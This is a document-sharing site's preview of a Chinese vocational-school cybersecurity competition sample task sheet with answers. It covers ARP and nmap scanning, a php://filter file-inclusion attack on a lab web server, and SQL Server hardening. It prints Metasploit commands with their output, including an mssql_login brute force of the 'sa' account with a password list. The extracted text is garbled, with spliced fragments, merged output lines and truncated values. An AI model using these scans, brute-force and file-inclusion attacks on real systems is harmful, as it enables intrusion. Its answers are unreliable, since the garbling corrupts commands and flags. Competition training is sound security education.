ImageVerifierCode 换一换
格式:DOCX , 页数:16 ,大小:87.54KB ,
资源ID:16849073      下载积分:3 金币
快捷下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.bdocx.com/down/16849073.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(江苏省度中职组网络空间安全赛项样题及答案Word格式.docx)为本站会员(b****3)主动上传,冰豆网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰豆网(发送邮件至service@bdocx.com或直接QQ联系客服),我们立即给予删除!

江苏省度中职组网络空间安全赛项样题及答案Word格式.docx

1、第二阶段分组对抗系统加固11:30渗透测试15-12:三、竞赛任务书内容(一)拓扑图(二)第一阶段任务书任务1.ARP扫描渗透测试任务环境说明: 服务器场景:CentOS5.5 服务器场景操作系统:1. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作使用命令中固定不变的字符串作为Flag提交;Arping c 5 x.x.x.x2. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具arping,发送请求数据包数量为5个),并将该操作结果的最后1行,从左边数第2个数字

2、作为Flag提交;rootkali:# arping -c 5 192.168.28.122ARPING 192.168.28.122 from 192.168.28.100 eth0Unicast reply from 192.168.28.122 00:0C:29:62:80:73 1.017ms73 0.638ms73 1.051ms73 1.590msSent 5 probes (1 broadcast(s)Received 5 response(s)Flag:53. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_s

3、weep模块),并将工具Metasploit中arp_sweep模块存放路径字符串作为Flag(形式:字符串1/字符串2/字符串3/字符串n)提交; msf use auxiliary/scanner/discovery/arp_sweepAuxiliary/scanner/discovery/arp_sweep 4. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的最后1行的最后1个单词作为Flag提

4、交;msf msf auxiliary(arp_sweep) run* 192.168.28.122 appears to be up (VMware, Inc.).* 192.168.28.2 appears to be up (VMware, Inc.).* Scanned 1 of 1 hosts (100% complete)* Auxiliary module execution completedcompleted5. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS

5、5.5在线,请将工具Metasploit中arp_sweep模块运行显示结果的第1行出现的IP地址右边的第1个单词作为Flag提交;appears6. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ARP扫描渗透测试(使用工具Metasploit中arp_sweep模块),假设目标服务器场景CentOS5.5在线,请将工具Metasploit中arp_sweep模块的运行命令字符串作为Flag提交;exploit or run任务2.操作系统及应用程序扫描渗透测试1. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap,使用参数n,使用

6、必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Nmap n Sp x.x.x.x2. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行ping扫描渗透测试(使用工具nmap),并将该操作显示结果的上数第3行左数第3个单词作为Flag提交;# nmap -n -sP 192.168.28.122Starting Nmap 7.40 ( https:/nmap.org ) at 2017-12-10 19:59 ESTNmap scan report for 192.168.28.122Host is up (0.00069s latency).Nmap do

7、ne: 1 IP address (1 host up) scanned in 0.09 secondsup3. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;# nmap -n -A 192.168.28.122/nmap.org ) at 2017-12-10 20:11 ESTHost is up (0.00025s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tc

8、p open ssh OpenSSH 4.3 (protocol 2.0)| ssh-hostkey: | 1024 95:7e:e7:af:67:6f:3b:ad:dd:4d:37:a6:34:ac:6c:08 (DSA)|_ 2048 90:3f:56:9b:cd:c7:5b:aa:1c:40:57:45:c4:c1:cd (RSA)111/tcp open rpcbind 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpc

9、bind| 100024 1 910/udp status|_ 100024 1 913/tcp statusMAC Address: 00:73 (VMware)Device type: general purposeRunning: Linux 2.6.XOS CPE: cpe:/o:linux:linux_kernel:2.6OS details: Linux 2.6.9 - 2.6.30Network Distance: 1 hopTRACEROUTEHOP RTT ADDRESS1 0.25 ms 192.168.28.122OS and Service detection perf

10、ormed. Please report any incorrect results at https:/nmap.org/submit/ . 1 IP address (1 host up) scanned in 8.22 secondsNmap n A x.x.x.x4. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行综合性扫描渗透测试(使用工具nmap,使用参数n,使用必须要使用的参数),并将该操作显示结果的最后1行最后1个单词作为Flag提交;seconds5. 通过PC2中渗透测试平台对服务器场景CentOS5.5进行操作系统扫描渗透测试(使用工具nmap,使用必须要使用

11、的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;# nmap -O 192.168.28.12213 ESTHost is up (0.00044s latency).PORT STATE SERVICE22/tcp open ssh111/tcp open rpcbindOS detection performed. Please report any incorrect results at https: 1 IP address (1 host up) scanned in 14.80 secondsNmap O x.x.x.x6. 通过通过PC2中渗透测试平台对服务器场

12、景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作使用命令中必须要使用的参数作为Flag提交;Nmap sV x.x.x.x7. 通过通过PC2中渗透测试平台对服务器场景CentOS5.5进行系统服务及版本号扫描渗透测试(使用工具nmap,使用必须要使用的参数),并将该操作显示结果的SSH服务版本信息字符串作为Flag提交;# nmap -sV 192.168.28.12217 ESTHost is up (0.00014s latency).Service detection performed. Please report any i

13、ncorrect results at https: 1 IP address (1 host up) scanned in 19.60 secondsOpenSSH 4.3任务3.Web应用程序文件包含安全攻防 服务器场景名称:WebServ2003 服务器场景安全操作系统:Microsoft Windows2003 Server 服务器场景安装中间件:Apache2.2; 服务器场景安装Web开发环境:Php6; 服务器场景安装数据库:Microsoft SqlServer2000; 服务器场景安装文本编辑器:EditPlus;1. 访问WebServ2003服务器场景,/-Display

14、 Uploadeds File Content,分析该页面源程序,找到提交的变量名,并将该变量名作为Flag(形式:name=“变量名”)提交;2. 对该任务题目1页面注入点进行渗透测试,通过php:/filter协议使当前页面以Base64编码方式回显WebServ2003服务器场景访问日志文件:AppServ/Apache2.2/logs/flag.log的内容,并将注入语句作为Flag提交;3. 对该任务题目2页面注入点进行注入以后,将当前页面以Base64编码方式回显内容作为Flag提交;4. 通过PHP函数对题目3中Base64编码回显内容进行解码,并将解码内容作为Flag提交;5.

15、 进入WebServ2003服务器场景的目录,找到DisplayFileCtrl.php文件,使用EditPlus工具打开并填写该文件中空缺的F1、F2、F3、F4的值,使之可以抵御文件包含渗透测试,并提交Flag(形式:F1|F2|F3|F4);6. 再次对该任务题目1页面注入点进行渗透测试,验证此次利用该注入点对WebServ2003服务器场景进行文件包含渗透测试无效,并将回显页面源文件内容作为Flag提交;任务4.数据库安全加固1. 对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft SqlServer2000能够支持远程连接,并将补丁包程序所在目录名称作为Fl

16、ag提交;2. 对服务器场景WebServ2003安装补丁,使其中的数据库Microsoft SqlServer2000能够支持远程连接,在安装补丁后的服务器场景中运行netstatan命令,将回显的数据库服务连接状态作为Flag提交;C:Documents and SettingsAdministratornetstat -anActive Connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING445 0.0.0.0:1025 0.0.0.0:1433 0.0.0.0:

17、 TCP 192.168.28.131:139 0.0.0.0: UDP 0.0.0.0:445 *:*500 *:1434 *:4500 *: UDP 127.0.0.1:123 *: UDP 192.168.28.131:137 *:138 *:LISTENING3. 通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务扫描渗透测试,并将扫描结果作为Flag提交; use auxiliary/scanner/mssql/mssql_pingmsf auxiliary(mssql_ping) * 192.168.28.131: - SQL Server informat

18、ion for 192.168.28.131:+ 192.168.28.131: - ServerName = SERVER - InstanceName = MSSQLSERVER - IsClustered = No - Version = 8.00.194 - tcp = 1433 - np = SERVERpipesqlquery4. 通过PC2中的渗透测试平台对服务器场景WebServ2003进行数据库服务超级管理员口令暴力破解(使用PC2中的渗透测试平台中的字典文件superdic.txt),并将破解结果中的最后一个字符串作为Flag提交; use auxiliary/scanne

19、r/mssql/mssql_loginmsf auxiliary(mssql_login) set username sa set pass_file /usr/share/wordlists/metasploit/password.lst msf auxiliary(mssql_login) 1433 - 192.168.28.131:1433 - MSSQL - Starting authentication scanner.! 192.168.28.131:1433 - No active DB - Credential data will not be saved!- 192.168.28.131:1433 - LOGIN FAILED: WORKSTATIONsa:!#$% (Incorrect: )#$% (Incorrect:#$%& (Incorrect:* (Incorrect:boerbul (Incorrect:boerseun (Incorrect:- 192.168.28.

copyright@ 2008-2022 冰豆网网站版权所有

经营许可证编号:鄂ICP备2022015515号-1